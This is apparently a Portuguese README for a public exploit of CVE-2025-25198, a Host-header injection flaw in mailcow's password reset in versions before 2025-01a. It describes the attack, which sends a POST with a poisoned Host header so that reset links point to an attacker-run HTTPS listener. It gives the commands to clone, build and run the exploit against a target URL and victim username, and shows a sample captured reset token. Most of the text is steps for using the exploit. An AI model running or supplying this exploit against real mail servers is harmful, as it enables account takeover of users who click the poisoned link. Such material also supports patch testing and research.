
Captura tokens de redefinição de senha em ataques de injeção de cabeçalho Host no Mailcow.
mailcow: dockerized é uma suíte de e-mail/groupware de código aberto baseada em docker. Antes da versão 2025-01a, uma vulnerabilidade na funcionalidade de redefinição de senha do mailcow permite que um atacante manipule o cabeçalho Host HTTP para gerar um link de redefinição de senha apontando para um domínio controlado pelo atacante. Isso pode levar à tomada de conta se um usuário clicar no link envenenado.
Configura um servidor https para ouvir todas as solicitações e envia uma solicitação POST para o site com o cabeçalho Host contendo o seu selecionado. Você também pode usar o Burpsuite para enviar a solicitação e obter o Token no servidor.
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port> <--insecure | opcional >
Após aguardar um pouco, o servidor exibirá o token que você pode usar:
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245